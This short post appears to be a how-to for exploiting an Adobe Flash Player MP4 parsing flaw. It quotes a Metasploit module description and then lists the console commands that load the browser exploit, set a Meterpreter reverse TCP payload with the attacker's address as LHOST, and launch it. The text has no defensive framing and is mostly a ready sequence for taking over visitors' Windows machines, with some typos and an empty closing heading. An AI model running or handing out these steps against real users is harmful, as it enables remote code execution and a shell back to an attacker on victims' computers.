Adobe Flash Player 新安全漏洞

【Not vulnerable】

Adobe Flash Player 11.1.115.6

Adobe Flash Player 11.1.111.6

Adobe Flash Player 11.1.102.6

【README – Metasploit Modules】

This module exploits a vulnerability found in Adobe Flash Player’s Flash10u.ocx component. When processing a MP4 file (specifically the Sequence Parameter Set), Flash will see if pic_order_cnt_type is equal to 1, which sets the num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies data in offset_for_ref_frame on the stack, which allows arbitrary remote code execution under the context of the user.

【modules】

abobe_flash_mp4_cprt

【command】

msfupdate && msfconsole

serach adobe_mp4

use exploit/windows/browser/adobe_flash_mp4_cprt

show options

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST MY_IP

set URIPATH /

exploit

【supportate】